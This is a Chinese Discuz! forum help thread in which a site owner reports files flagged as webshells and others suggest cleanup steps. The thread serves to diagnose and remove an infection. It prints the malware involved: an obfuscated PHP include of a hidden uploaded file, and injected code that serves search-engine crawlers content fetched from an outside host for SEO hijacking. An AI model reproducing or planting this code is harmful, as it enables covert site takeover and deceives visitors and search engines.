久久久久av_欧美日韩一区二区在线_国产精品三区四区_日韩中字在线

12下一頁
返回列表 發(fā)帖
查看: 15570|回復: 11

[求助] 兩個文件總是提示為WEBSHELL

34

主題

162

回帖

216

積分

爐火純青

貢獻
0 點
金幣
4 個
QQ
樓主
發(fā)表于 2020-9-26 20:49:42 | 只看樓主 |倒序瀏覽 |閱讀模式
警告 index.php文件為webshell;警告 portal.php文件為webshell;官方文件剛替換查殺也提示。后臺檢測也沒有文件被修改。
我知道答案 回答被采納將會獲得1 貢獻 已有11人回答
回復

使用道具 舉報

83

主題

2786

回帖

3569

積分

功行圓滿

貢獻
23 點
金幣
351 個
沙發(fā)
發(fā)表于 2020-9-27 01:46:03 | 只看Ta
若存在,處理前,先卸載所有盜版插件與模版。

進discuz后臺找到工具-文件校驗,看下最近有哪些php文件被修改了。

1、排查網(wǎng)站源文件的php 文件,查看是否有出現(xiàn)IP地址、或者異常網(wǎng)站(上面跳轉(zhuǎn)的網(wǎng)站),如果有刪除就可以了。

2、排查網(wǎng)站源文件的php 文件,查看是否有如下代碼:@include($_SERVER['DOCUMENT_ROOT']

(排查一般用WEBshell后門掃描軟件掃描核查!)

如果有就刪除此段代碼。并把該段代碼進行解密。

舉例:@include($_SERVER['DOCUMENT_ROOT'].PACK('H*','2F646174612F6176617461722F30'));

需要解密的代碼為:2F646174612F6176617461722F30

解密后為:/data/avatar/0

代碼解密地址:http://www.bejson.com/convert/ox2str/


意思就是在上述路徑下存在被非法上傳的文件,用于做快照劫持。

解決辦法:刪除上面的代碼和文件即可。

掛馬問題解決了后,記得更改服務(wù)器相關(guān)的各種密碼,盡量設(shè)置的復雜一點。
回復

使用道具 舉報

34

主題

162

回帖

216

積分

爐火純青

貢獻
0 點
金幣
4 個
QQ
板凳
 樓主| 發(fā)表于 2020-9-27 13:08:51 | 只看Ta
<?php
header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,strtolower('HaosouSpider'))!== false||strpos($key,strtolower('baidu'))!== false||strpos($key,strtolower('Yisou'))!== false||strpos($key,strtolower('Sogou'))!== false||strpos($key,strtolower('YisouSpider'))!== false||strpos($key,strtolower('360Spider'))!== false||strpos($key,strtolower('Baiduspide'))!== false||strpos($key,strtolower('Soso'))!== false||strpos($key,strtolower('Yahoo'))!== false||strpos($key,strtolower('bingbot'))!== false )
{
date_default_timezone_set('PRC');
$TD_server = "http://www.hack163.com/shou/";
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$Content_mb=file_get_contents($TD_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);

echo $Content_mb;
}


?>
在這幾個文件中加入了這樣一段代碼。
回復

使用道具 舉報

19

主題

2195

回帖

3310

積分

應(yīng)用開發(fā)者

貢獻
74 點
金幣
629 個
QQ
地板
發(fā)表于 2020-9-27 13:57:55 | 只看Ta
打開看看 是否被改了 對比官方文件
回復

使用道具 舉報

19

主題

2195

回帖

3310

積分

應(yīng)用開發(fā)者

貢獻
74 點
金幣
629 個
QQ
5#
發(fā)表于 2020-9-27 13:58:29 | 只看Ta
9axl 發(fā)表于 2020-9-27 13:08
在這幾個文件中加入了這樣一段代碼。

典型的掛馬了
回復

使用道具 舉報

34

主題

162

回帖

216

積分

爐火純青

貢獻
0 點
金幣
4 個
QQ
6#
 樓主| 發(fā)表于 2020-9-28 10:02:27 | 只看Ta
空間商技術(shù)人員說是DZ程序漏洞,被注入。
回復

使用道具 舉報

19

主題

2195

回帖

3310

積分

應(yīng)用開發(fā)者

貢獻
74 點
金幣
629 個
QQ
7#
發(fā)表于 2020-9-28 11:39:25 | 只看Ta
9axl 發(fā)表于 2020-9-28 10:02
空間商技術(shù)人員說是DZ程序漏洞,被注入。

我可以反過來說 空間商空間有漏洞被注入了嗎

空間商甩鍋啊 要解決 而不是推卸責任
回復

使用道具 舉報

83

主題

2786

回帖

3569

積分

功行圓滿

貢獻
23 點
金幣
351 個
8#
發(fā)表于 2020-9-28 18:47:44 | 只看Ta
9axl 發(fā)表于 2020-9-28 01:02
空間商技術(shù)人員說是DZ程序漏洞,被注入。

不負責任空間,及早備份搬家去。
回復

使用道具 舉報

11

主題

274

回帖

433

積分

爐火純青

貢獻
0 點
金幣
118 個
9#
發(fā)表于 2020-9-28 22:18:25 來自手機 | 只看Ta
crx349 發(fā)表于 2020-9-28 11:39
我可以反過來說 空間商空間有漏洞被注入了嗎

空間商甩鍋啊 要解決 而不是推卸責任 ...

真不怪空間商,說白了你就是用盜版插件或者模板造成的
回復

使用道具 舉報

34

主題

162

回帖

216

積分

爐火純青

貢獻
0 點
金幣
4 個
QQ
10#
 樓主| 發(fā)表于 2020-9-29 13:17:45 | 只看Ta
現(xiàn)在我將網(wǎng)站里面的所有文件都移到一個新建的OLD文件夾里,然后,全新上傳了3。4,現(xiàn)在看看有怎樣的結(jié)果。
回復

使用道具 舉報

您需要登錄后才可以回帖 登錄 | 立即注冊

本版積分規(guī)則

  • 關(guān)注公眾號
  • 有償服務(wù)微信
  • 有償服務(wù)QQ

手機版|小黑屋|Discuz! 官方交流社區(qū) ( 皖I(lǐng)CP備16010102號 |皖公網(wǎng)安備34010302002376號 )|網(wǎng)站地圖|star

GMT+8, 2025-9-19 14:52 , Processed in 0.069606 second(s), 26 queries .

Powered by Discuz! W1.0 Licensed

Copyright © 2001-2025 Discuz! Team.

關(guān)燈 在本版發(fā)帖
有償服務(wù)QQ
有償服務(wù)微信
返回頂部
快速回復 返回頂部 返回列表